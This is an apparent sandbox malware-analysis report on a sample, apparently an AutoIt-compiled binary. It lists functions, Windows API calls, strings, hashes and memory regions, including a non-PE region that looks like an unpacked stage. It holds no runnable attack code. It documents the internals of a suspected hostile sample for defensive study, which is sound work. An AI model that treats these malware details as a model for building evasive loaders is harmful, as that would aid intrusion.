Opcode Fuzzy Hash: cfe72f9a186ff9d1c7df8e7fc89bc66494b234bcfc2132d80178ca36439ee653
Instruction Fuzzy Hash: 4AA28D74A00216CFCB24DF58C485AA9BBB6FF59314F28845BE9069F351D731ED82CB91

Function 005D47D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 005D4834

Part of subcall function 005F336C: __lock.LIBCMT ref: 005F3372
Part of subcall function 005F336C: DecodePointer.KERNEL32(00000001,?,005D4849,00627C74), ref: 005F337E
Part of subcall function 005F336C: EncodePointer.KERNEL32(?,?,005D4849,00627C74), ref: 005F3389

Part of subcall function 005D48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 005D4915
Part of subcall function 005D48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 005D492A

Part of subcall function 005D3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 005D3B68
Part of subcall function 005D3B3A: IsDebuggerPresent.KERNEL32 ref: 005D3B7A
Part of subcall function 005D3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,006952F8,006952E0,?,?), ref: 005D3BEB
Part of subcall function 005D3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 005D3C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 005D4874

Strings

xq, xrefs: 005D47D6
, xrefs: 005D4851, 005D4864

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID: xq$
API String ID: 1438897964-1896469863
Opcode ID: 35c22a6802820469d91df65c74c7915f7eb3e0f5abeeb643437b6068b6762c7c
Instruction ID: 381db2caf70fc81152c6cefb9c4d878ffe10d7d63fea9576a6b8d306348dfc67
Opcode Fuzzy Hash: 35c22a6802820469d91df65c74c7915f7eb3e0f5abeeb643437b6068b6762c7c
Instruction Fuzzy Hash: 291189719083469BD710EF69E80990ABFE9FB89B50F10891BF041972B1DBB09649CB92

Function 0063445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0060E398), ref: 0063446A
FindFirstFileW.KERNELBASE(?,?), ref: 0063447B
FindClose.KERNEL32(00000000), ref: 0063448B

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: bab71b657124f5fee831444d1a407666f83fe386462d4906277bd3c05e1f6d46
Instruction ID: 9bb19fb3596278a37364a63452637f9435ae9e2894849b291aa0867bcb03c535
Opcode Fuzzy Hash: bab71b657124f5fee831444d1a407666f83fe386462d4906277bd3c05e1f6d46
Instruction Fuzzy Hash: 6EE0D872410601675310AB78EC0D4E9B79EDE05336F100725F935C21E0EBB46D0096D6

Function 005E09D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005E0A5B
timeGetTime.WINMM ref: 005E0D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005E0E53
Sleep.KERNEL32(0000000A), ref: 005E0E61
LockWindowUpdate.USER32(00000000,?,?), ref: 005E0EFA
DestroyWindow.USER32 ref: 005E0F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 005E0F20
Sleep.KERNEL32(0000000A,?,?), ref: 00614E83
TranslateMessage.USER32(?), ref: 00615C60
DispatchMessageW.USER32(?), ref: 00615C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00615C82

Strings

@GUI_CTRLHANDLE, xrefs: 00614FE4
pbi, xrefs: 00615003
@GUI_CTRLID, xrefs: 00614F3A
@TRAY_ID, xrefs: 0061578F
pbi, xrefs: 006157B4
pbi, xrefs: 00614FAE
pbi, xrefs: 00614F59
@COM_EVENTOBJ, xrefs: 006154F0
@GUI_WINHANDLE, xrefs: 00614F8F

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbi$pbi$pbi$pbi
API String ID: 4212290369-1687800869
Opcode ID: 3b9ae21ceb7b70974b1fde57610f017006a4a597a7510f953742ca2ab2f3e5d4
Instruction ID: 83a492c2042221007cd5b8d2e9df0e0730f7780bd18ed14fc50d12666d11fc6c
Opcode Fuzzy Hash: 3b9ae21ceb7b70974b1fde57610f017006a4a597a7510f953742ca2ab2f3e5d4
Instruction Fuzzy Hash: CEB2B470604741DFD728DF24C885BAAFBE6BF84304F18491EE59A973A1D770E985CB82

Function 00639155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00638F5F: __time64.LIBCMT ref: 00638F69

Part of subcall function 005D4EE5: _fseek.LIBCMT ref: 005D4EFD

__wsplitpath.LIBCMT ref: 00639234

Part of subcall function 005F40FB: __wsplitpath_helper.LIBCMT ref: 005F413B

_wcscpy.LIBCMT ref: 00639247
_wcscat.LIBCMT ref: 0063925A
__wsplitpath.LIBCMT ref: 0063927F
_wcscat.LIBCMT ref: 00639295
_wcscat.LIBCMT ref: 006392A8

Part of subcall function 00638FA5: _memmove.LIBCMT ref: 00638FDE
Part of subcall function 00638FA5: _memmove.LIBCMT ref: 00638FED

_wcscmp.LIBCMT ref: 006391EF

Part of subcall function 00639734: _wcscmp.LIBCMT ref: 00639824
Part of subcall function 00639734: _wcscmp.LIBCMT ref: 00639837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00639452
_wcsncpy.LIBCMT ref: 006394C5
DeleteFileW.KERNEL32(?,?), ref: 006394FB
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00639511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00639522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00639534

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: aa0919841680a425d90677522941f371dd745bb9cc5d3bd04cf063febf691bb5
Instruction ID: b687700512d57e7c5afec8b70954ea54c6e4e921e196d1402989143b287c0f8d
Opcode Fuzzy Hash: aa0919841680a425d90677522941f371dd745bb9cc5d3bd04cf063febf691bb5
Instruction Fuzzy Hash: F7C111B1D00219ABDF21DF95CC85AEEBBBDEF85310F0040AAF609E7251DB709A458F65

Function 005D3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 005D3074
RegisterClassExW.USER32(00000030), ref: 005D309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005D30AF
InitCommonControlsEx.COMCTL32(?), ref: 005D30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005D30DC
LoadIconW.USER32(000000A9), ref: 005D30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005D3101

Strings

+, xrefs: 005D305D
TaskbarCreated, xrefs: 005D30A4
0, xrefs: 005D3056
AutoIt v3 GUI, xrefs: 005D3090

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 30d1590864be4a43aa6198485031f9c415a4ed62e1b88594ea0589961525db08
Instruction ID: 6281a16adc45cf4017e812e78d04395e031bdd4bcd9bf876a0bc5611acfb8fe9
Opcode Fuzzy Hash: 30d1590864be4a43aa6198485031f9c415a4ed62e1b88594ea0589961525db08
Instruction Fuzzy Hash: 813144B1801359AFDB02CFA4EC89ADABFF6FB09311F14516BE981EA2A0D3B50545CF51

Function 005D3A46 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 005D3A50
LoadCursorW.USER32(00000000,00007F00), ref: 005D3A5F
LoadIconW.USER32(00000063), ref: 005D3A76
LoadIconW.USER32(000000A4), ref: 005D3A88
LoadIconW.USER32(000000A2), ref: 005D3A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005D3AC0
RegisterClassExW.USER32(?), ref: 005D3B16

Part of subcall function 005D3041: GetSysColorBrush.USER32(0000000F), ref: 005D3074
Part of subcall function 005D3041: RegisterClassExW.USER32(00000030), ref: 005D309E
Part of subcall function 005D3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005D30AF
Part of subcall function 005D3041: InitCommonControlsEx.COMCTL32(?), ref: 005D30CC
Part of subcall function 005D3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005D30DC
Part of subcall function 005D3041: LoadIconW.USER32(000000A9), ref: 005D30F2
Part of subcall function 005D3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005D3101

Strings

#, xrefs: 005D3AFB
xq, xrefs: 005D3AA1
AutoIt v3, xrefs: 005D3B05
0, xrefs: 005D3AF4

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3$xq
API String ID: 423443420-524432560
Opcode ID: d4c6654c4cb62c97521e48ce878f4bd441865e14bdbb7754ef6de041dbfcbc1a
Instruction ID: b8507d009e54b280885de546ae4a2caaa46b58cf6930f8779be1e2256771bd08
Opcode Fuzzy Hash: d4c6654c4cb62c97521e48ce878f4bd441865e14bdbb7754ef6de041dbfcbc1a
Instruction Fuzzy Hash: 84213770900308AFEF12DFA8EC09B9D7FBAFB08711F00116BF505A66A1D3B696508F84

Function 005D3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 005D3074
RegisterClassExW.USER32(00000030), ref: 005D309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005D30AF
InitCommonControlsEx.COMCTL32(?), ref: 005D30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005D30DC
LoadIconW.USER32(000000A9), ref: 005D30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005D3101

Strings

+, xrefs: 005D305D
TaskbarCreated, xrefs: 005D30A4
0, xrefs: 005D3056
AutoIt v3 GUI, xrefs: 005D3090

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: e64cf33c974276c0338ce13ba45ebea482b5b5bc4431b9eccba700f6c7f7f09d
Instruction ID: 9d596076aa54c28492933f3b01522c8d90932833d70f1869b4d52e7df96c3837
Opcode Fuzzy Hash: e64cf33c974276c0338ce13ba45ebea482b5b5bc4431b9eccba700f6c7f7f09d
Instruction Fuzzy Hash: 0F21F4B1911718AFDB01DFA4ED88BDEBBFAFB08701F00512BF912A62A0D7B145448F91

Function 005D708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 005D4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,006952F8,?,005D37AE,?), ref: 005D4724

Part of subcall function 005F050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,005D7165), ref: 005F052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 005D71A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0060E8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0060E909
RegCloseKey.ADVAPI32(?), ref: 0060E947
_wcscat.LIBCMT ref: 0060E9A0

Strings

\, xrefs: 0060E9C3
\Include\, xrefs: 005D7165
Include, xrefs: 0060E8BF, 0060E900
Software\AutoIt v3\AutoIt, xrefs: 005D719E

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 937eeef2f7d46a98468464a32126d561cd19ba813543b40362bf66ccbe94c97b
Instruction ID: e7f7173d737dee32d327895ccc856282e2bd0093e8b969b06203b3d656da4c0c
Opcode Fuzzy Hash: 937eeef2f7d46a98468464a32126d561cd19ba813543b40362bf66ccbe94c97b
Instruction Fuzzy Hash: 2771BE715083069EC714EF69EC559ABBBEEFF88350F40192FF445872A0EB719A48CB52

Function 005D3633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 005D36D2
KillTimer.USER32(?,00000001), ref: 005D36FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 005D371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005D372A
CreatePopupMenu.USER32 ref: 005D373E
PostQuitMessage.USER32(00000000), ref: 005D374D

Strings

%f, xrefs: 0060D081, 0060D0CF
TaskbarCreated, xrefs: 005D3725

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated$%f
API String ID: 129472671-3975018843
Opcode ID: 2d2af3e260e64f2d7aaa1948d5c3dcf2e47308bf0044cd69301879234ae5e309
Instruction ID: 4fa7bc6f5c0ca37afd4e601c0015fe1d4737d226f150a2e8f2b04063307a92e1
Opcode Fuzzy Hash: 2d2af3e260e64f2d7aaa1948d5c3dcf2e47308bf0044cd69301879234ae5e309
Instruction Fuzzy Hash: A341E4B1240A06ABDB35AF6CEC09BBA3F5BFB44301F101527F503963A1DA619B40D767

Function 005D3766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/AutoIt3ExecuteLine, xrefs: 005D38A7
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 005D37AE
/AutoIt3ExecuteScript, xrefs: 005D38BC
Ri, xrefs: 0060D213
/ErrorStdOut, xrefs: 005D387D
/AutoIt3OutputDebug, xrefs: 005D3892
CMDLINERAW, xrefs: 005D37FB
CMDLINE, xrefs: 005D3822

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$Ri
API String ID: 1825951767-2712856176
Opcode ID: aad1b888a445bcb98304e8b049bc1b04ad0e124ecfdf3f9db6ec3e0d238ccb82
Instruction ID: bf9034ed08891140d8cfd0554bf8a0e2770f0467f9338a6429280838c9303c1a
Opcode Fuzzy Hash: aad1b888a445bcb98304e8b049bc1b04ad0e124ecfdf3f9db6ec3e0d238ccb82
Instruction Fuzzy Hash: EFA13C7190021E9ACB25EBA8DC599FEBB79FF54300F44052BF416A7391EF745A08CBA1

Function 005DF76F Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 005F0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 005F0193
Part of subcall function 005F0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 005F019B
Part of subcall function 005F0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 005F01A6
Part of subcall function 005F0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 005F01B1
Part of subcall function 005F0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 005F01B9
Part of subcall function 005F0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 005F01C1

Part of subcall function 005E60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,005DF930), ref: 005E6154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 005DF9CD
OleInitialize.OLE32(00000000), ref: 005DFA4A
CloseHandle.KERNEL32(00000000), ref: 006145C8

Strings

%f, xrefs: 005DF796, 005DF7A8, 005DF96E, 005DFA51
Si, xrefs: 005DF7EB
p, xrefs: 005DF84C
@, xrefs: 005DF7F7
<Wi, xrefs: 005DF930
H, xrefs: 005DF914

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <Wi$@$H$p$%f$Si
API String ID: 1986988660-1563658213
Opcode ID: 6ca20eb3729b8370592824d318e42b03fc067d03250cc9dfc3989392099aa982
Instruction ID: 937647af770b0580548a6ded3ec200af37a38416f29b3bd67169b7a79085d350
Opcode Fuzzy Hash: 6ca20eb3729b8370592824d318e42b03fc067d03250cc9dfc3989392099aa982
Instruction Fuzzy Hash: 4F81DBB0901A418FC786DF79A9446297FEFFB98B06750A12B900BCBB72EB704585CF51

Function 00F25640 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00F25711
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F25937

Memory Dump Source

Source File: 00000000.00000002.1456569915.0000000000F23000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F23000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f23000_M7XS5C07kV.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction ID: 64abb59d5e7465f37321224794825f5cbd9afab772e11a3a77ecc422955e62c1
Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction Fuzzy Hash: C8A11675E00218EBDB14CFA4D894BEEBBB5FF48714F208159E501BB280D7B99A80DF94

Function 005D39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 005D3A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 005D3A24
ShowWindow.USER32(00000000,?,?), ref: 005D3A38
ShowWindow.USER32(00000000,?,?), ref: 005D3A41

Strings

AutoIt v3, xrefs: 005D39FB, 005D3A00, 005D3A01
edit, xrefs: 005D3A1E

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: b585ee9bec3a4c6aba3fb42d4cd9403046b099aae4304982551c9f5ddda372ff
Instruction ID: 525e93a215cbd7dfd9b6b493b927f42362c2a1811a8b3f5abe16d7c775ee58ad
Opcode Fuzzy Hash: b585ee9bec3a4c6aba3fb42d4cd9403046b099aae4304982551c9f5ddda372ff
Instruction Fuzzy Hash: 77F03A70500690BEEB325B236C08E2B3E7FD7CAF61F00102AB901A21B0C2611800CBB0

Function 00F25410 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 145
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F25300: Sleep.KERNELBASE(000001F4), ref: 00F25311

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00F25532

Strings

DJOZMZD5ASU2LW6COTEQNQ3, xrefs: 00F25595, 00F25598

Memory Dump Source

Source File: 00000000.00000002.1456569915.0000000000F23000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F23000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f23000_M7XS5C07kV.jbxd

Similarity

API ID: CreateFileSleep
String ID: DJOZMZD5ASU2LW6COTEQNQ3
API String ID: 2694422964-1355228031
Opcode ID: a711a239af82cf5ec917fdc3e3225e25557e97a77bac66c4b016a61429e4061e
